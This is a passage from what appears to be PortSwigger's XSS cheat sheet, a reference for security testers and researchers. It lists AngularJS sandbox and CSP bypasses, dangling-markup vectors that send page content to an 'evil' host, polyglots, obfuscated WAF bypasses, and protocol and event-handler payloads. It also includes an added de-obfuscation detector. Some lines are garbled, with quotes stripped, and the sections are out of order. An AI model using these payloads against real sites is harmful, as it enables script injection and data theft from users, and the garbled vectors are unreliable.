1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute
<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
Link href stylesheet
<link rel=stylesheet href="//evil?
Link href icon
<link rel=icon href="//evil?
Meta refresh
<meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute
<img src="//evil? <image src="//evil?
Video using track element
<video><track default src="//evil?
Video using source element and src attribute
<video><source src="//evil?
Audio using source element and src attribute
<audio><source src="//evil?
Input src
<input type=image src="//evil?
Button using formaction
<form><button style="width:100%;height:100%;" type=submit formaction="//evil?
Input using formaction
<form><input type=submit value="XSS" style="width:100%;height:100%;" type=submit formaction="//evil?
Form using action
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data
<object data="//evil?
Iframe src
<iframe src="//evil?
Embed src
<embed src="//evil?
Use textarea to consume markup and post to external site
<form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using formtarget
<button form=x>XSS</button><form id=x action=//evil/ target='
Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames): frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis): globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, octal escape sequence (window): window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (self): self['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (this): this['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (top): top['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (parent): parent['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (frames): frames['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (globalThis): globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window): window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (self): self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (this): this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (top): top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (parent): parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (frames): frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (globalThis): globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window): window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self): self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (this): this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top): top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent): parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames): frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis): globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window): window[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (self): self[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (this): this[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (top): top[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (parent): parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (frames): frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis): globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
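All of the global-object vectors above rely on the same idea: the property name (`alert`, `document`, `eval`) never appears in the source, so a filter that looks for those words never fires, while the JS engine resolves string concatenation, comments, `\x`/octal/`\u` escapes, `RegExp.source` and `atob()` back to the plain name. The following is an added example written for this page, not code from the cheat sheet: a small normaliser that undoes those layers so that a detection rule or code review sees the member that is actually accessed. The sample vectors are constructed from the forms listed above, and the function names are this example's own.

```javascript
// Added example (not part of the PortSwigger cheat sheet): collapse the
// obfuscation layers used by the "global objects" vectors so a detector can
// see the property name that is really being accessed. Runs under Node.js.

// Decode the body of a JS string literal (quotes already stripped) the way
// the engine does: \xHH, \ooo (octal), \uHHHH, \u{H...} and simple escapes.
function unescapeLiteral(body) {
  return body.replace(
    /\\(x[0-9a-fA-F]{2}|u\{[0-9a-fA-F]+\}|u[0-9a-fA-F]{4}|[0-7]{1,3}|[\s\S])/g,
    (m, esc) => {
      if (esc[0] === 'x' && esc.length === 3) return String.fromCharCode(parseInt(esc.slice(1), 16));
      if (esc[0] === 'u' && esc.length > 1) {
        const hex = esc[1] === '{' ? esc.slice(2, -1) : esc.slice(1);
        return String.fromCodePoint(parseInt(hex, 16));
      }
      if (/^[0-7]/.test(esc)) return String.fromCharCode(parseInt(esc, 8));   // \141 -> "a"
      return { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v' }[esc] || esc; // \' \" \\
    });
}

// Normalisation order matters: comments first (they can sit inside the
// brackets), then RegExp .source, then literal escapes, then "a"+"b"
// concatenation, then ["name"] -> .name, and finally atob() of a literal.
function normalise(js) {
  let out = js.replace(/\/\*[\s\S]*?\*\//g, '');                      // window[/*foo*/'alert'/*bar*/]
  out = out.replace(/\/((?:\\.|[^\/\\\n])+)\/\.source/g,               // /al/.source -> "al"
    (m, re) => JSON.stringify(re));
  out = out.replace(/(['"])((?:\\.|(?!\1)[^\\\n])*)\1/g,               // '\x61\x6c' -> "al"
    (m, q, body) => JSON.stringify(unescapeLiteral(body)));
  const concat = /"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"/;      // "ale"+"rt" -> "alert"
  while (concat.test(out)) {
    out = out.replace(concat, (m, a, b) => JSON.stringify(JSON.parse(`"${a}"`) + JSON.parse(`"${b}"`)));
  }
  out = out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, '.$1');                // window["alert"] -> window.alert
  out = out.replace(/\b(?:(?:window|self|this|top|parent|frames|globalThis)\.)?atob\(("(?:[^"\\]|\\.)*")\)/g,
    (m, lit) => JSON.stringify(Buffer.from(JSON.parse(lit), 'base64').toString('latin1'))); // atob("WFNT") -> "XSS"
  return out;
}

// Members worth flagging once the source has been normalised.
const SENSITIVE = ['alert', 'eval', 'Function', 'document', 'cookie', 'domain', 'location'];
function sensitiveMembers(js) {
  const norm = normalise(js);
  return SENSITIVE.filter((name) => new RegExp(`\\b${name}\\b`).test(norm));
}

// The kind of check a naive filter performs on the raw text.
function naiveMatch(js) { return /\b(?:alert|eval|document)\b/.test(js); }

// Constructed samples, one per technique from the cheat sheet section above.
const SAMPLES = [
  "window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])",
  "self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])",
  "top['\\x61\\x6c\\x65\\x72\\x74'](top['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e'])",
  "parent['\\141\\154\\145\\162\\164']('\\130\\123\\123')",
  "frames['\\u0061\\u006c\\u0065\\u0072\\u0074']('\\u0058\\u0053\\u0053')",
  "globalThis[/al/.source+/ert/.source](/XSS/.source)",
  "window['\\x65\\x76\\x61\\x6c'](window['\\x61\\x6c\\x65\\x72\\x74'](window['\\x61\\x74\\x6f\\x62']('WFNT')))",
];

for (const v of SAMPLES) {
  console.log(`naive=${naiveMatch(v)} flagged=[${sensitiveMembers(v)}]  ${normalise(v)}`);
}
```

The ordering of the passes is the point: a single regex for `\x61\x6c...` would miss the concatenated and commented forms, and decoding `atob()` before the bracket-to-dot rewrite would leave `window["atob"]` untouched. Each pass is idempotent, so running the whole function twice changes nothing.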
Classic vectors
Image src with JavaScript protocol: <img src="javascript:alert(1)">
Body background with JavaScript protocol: <body background="javascript:alert(1)">
Iframe data URLs no longer work, because modern browsers give them a null origin: <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol used to work in IE:
  <a href="vbscript:MsgBox+1">XSS</a>
  <a href="#" onclick="vbs:Msgbox+1">XSS</a>
  <a href="#" onclick="VBS:Msgbox+1">XSS</a>
  <a href="#" onclick="vbscript:Msgbox+1">XSS</a>
  <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
  <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE:
  <a href="#" onclick="jscript.compact:alert(1);">test</a>
  <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript:
  <a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
  <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript:
  <iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
  <iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator: <a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator: <link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup: <form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup: <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox 2 and earlier only:
  <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
  <div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
  <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
  <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
XBL also worked in Firefox 3.5 using data URLs: <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)" />
CSS expressions, IE7 and earlier:
  <div style=xss:expression(alert(1))>
  <div style=xss:expression(1)-alert(1)>
  <div style=xss:expressio\6e(alert(1))>
  <div style=xss:expressio\006e(alert(1))>
  <div style=xss:expressio\00006e(alert(1))>
  <div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of ::
  <div style=xss=expression(alert(1))>
  <div style="color&#x3d;red">test</div>
Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions:
  <script> function window.onload(){ alert(1) } </script>
  <script> function window::onload(){ alert(1) } </script>
  <script> function window.location(){ } </script>
  <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body>
  <body> <script> function document.body.innerHTML(){ x = '<img src=1 onerror=alert(1)>' } </script> </body>
GreyMagic HTML+TIME exploit (no longer works, even in IE5 docmode): <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after & (the NUL byte is written \x00 here): <a href="javascript:&\x00#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities: <a href="javascript&\x00colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments: <!--\x00> <img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG: <svg><xss onload=alert(1)>
Isindex using src attribute: <isindex type=image src=//evil?
Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction=//evil?
Isindex and formaction: <isindex type=submit formaction=javascript:alert(1)>
Isindex and action: <isindex type=submit action=javascript:alert(1)>

Impossible labs
Each lab gives a title, a description, the length limit and the closest known vector.

Basic context, WAF blocks <[a-zA-Z] (length limit: N/A; closest vector: N/A)
  This lab captures the scenario where you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag.
Script-based injection, but quotes, forward slash and backslash are escaped (length limit: N/A; closest vector: N/A)
  We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/back slashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script-based context and the second in HTML.
innerHTML context, but no equals allowed (length limit: N/A; closest vector: N/A)
  You have a site that processes the query string and URL-decodes the parameters, but splits on the equals sign and then assigns to innerHTML. In this context <script> doesn't work, and we can't use = to create an event.
Basic context, length limit (length limit: 15; closest vector: <q oncut=alert``, 16 characters)
  This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it?
Attribute context, length limit (length limit: 14; closest vector: oncut=alert`` followed by a space, 15 characters)
  The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Basic context, length limit, arbitrary code (length limit: 19; closest vector: <q/oncut=eval(name))
  It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Attribute context, length limit, arbitrary code (length limit: 17; closest vector: see the lab)
  Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute-based injection with arbitrary JavaScript.
Injection occurs inside a frameset but before the body (length limit: N/A; closest vector: N/A)
  We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Injection occurs inside a single-quoted string; only the characters a-zA-Z0-9+` are allowed (length limit: N/A; closest vector: N/A)
  The injection occurs within a single-quoted string, and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue, or by updating the JSON and creating a pull request.
onseeked
Requires clicking the element timeline: <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onseeking
Requires clicking the element timeline: <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onselect
Requires you to select text: <input onselect=alert(1) value="XSS" autofocus>
onselectionchange
Fires when the text selection on the page is changed: <body onselectionchange=alert(1)>select some text
onselectstart
Fires when a text selection begins: <body onselectstart=alert(1)>select some text
onshow
Fires when a context menu is shown: <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onsubmit
Requires a form submission: <form onsubmit=alert(1)><input type=submit>
ontouchend
Fires when a touch ends (touch-screen mobile devices only): <body ontouchend=alert(1)>
ontouchmove
Fires when a touch moves (touch-screen mobile devices only): <body ontouchmove=alert(1)>
ontouchstart
Fires when a touch starts (touch-screen mobile devices only): <body ontouchstart=alert(1)>
onvolumechange
Requires a volume adjustment: <audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onwheel
Fires when you use the mouse wheel: <body onwheel=alert(1)>
Restricted characters
No parentheses, using exception handling: <script>onerror=alert;throw 1</script>
No parentheses, using exception handling, no semicolons: <script>{onerror=alert}throw 1</script>
No parentheses, using exception handling, no semicolons, using expressions: <script>throw onerror=alert,1</script>
No parentheses, using exception handling and eval: <script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses, using exception handling and eval, on Firefox: <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses, using ES6 hasInstance and instanceof with eval: <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses, using ES6 hasInstance and instanceof with eval, without a dot: <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses, using location redirect: <script>location='javascript:alert\x281\x29'</script>
No parentheses, using location redirect, no strings: <script>location=name</script>
No parentheses, using template strings: <script>alert`1`</script>
No parentheses, using template strings and location hash: <script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses or spaces, using template strings and location hash: <script>Function`X${document.location.hash.substr`1`}```</script>
Frameworks
Bootstrap onanimationstart event: <xss class="progress-bar-animated" onanimationstart=alert(1)>
Bootstrap ontransitionend event: <xss class="carousel slide" data-ride="carousel" data-interval=100 ontransitionend=alert(1)><xss class="carousel-inner"><xss class="carousel-item active"></xss><xss class="carousel-item"></xss></xss></xss>
Protocols
Iframe src attribute, JavaScript protocol: <iframe src="javascript:alert(1)">
Object data attribute with JavaScript protocol: <object data="javascript:alert(1)">
Embed src attribute with JavaScript protocol: <embed src="javascript:alert(1)">
A standard JavaScript protocol: <a href="javascript:alert(1)">XSS</a>
The protocol is not case sensitive: <a href="JaVaScript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol: <a href=" javascript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed inside the protocol (the tab is written \x09 here): <a href="javas\x09cript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon (the newline is written \x0a here): <a href="javascript\x0a:alert(1)">XSS</a>
Xlink namespace inside SVG with JavaScript protocol: <svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
SVG animate tag using values: <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to: <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag: <svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src: <script src="data:text/javascript,alert(1)"></script>
SVG script href attribute without closing script tag: <svg><script href="data:text/javascript,alert(1)" />
SVG use element (Chrome/Firefox): <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Import statement with data URL: <script>import('data:text/javascript,alert(1)')</script>
Base tag with JavaScript protocol rewriting relative URLs: <base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
MathML makes any tag clickable: <math><x href="javascript:alert(1)">blah
Button and formaction: <form><button formaction=javascript:alert(1)>XSS
Input and formaction: <form><input type=submit formaction=javascript:alert(1) value=XSS>
Form and action: <form action=javascript:alert(1)><input type=submit value=XSS>
Use element with an external URL: <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Animate tag with keytimes and multiple values: <svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Other useful attributes
Using the srcdoc attribute: <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc with entities: <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Click a submit element from anywhere on the page, even outside the form: <form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: accesskey attributes can enable XSS on normally unexploitable elements: <input type="hidden" accesskey="X" onclick="alert(1)"> (press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Link elements: accesskey attributes can enable XSS on normally unexploitable elements: <link rel="canonical" accesskey="X" onclick="alert(1)" /> (press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Download attribute can save a copy of the current webpage: <a href=# download="filename.html">Test</a>
Disable the referrer using referrerpolicy: <img referrerpolicy="no-referrer" src="//portswigger-labs.net">
Set window.name via a parameter of the window.open function: <a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
Set window.name via the name attribute of an <iframe>: <iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
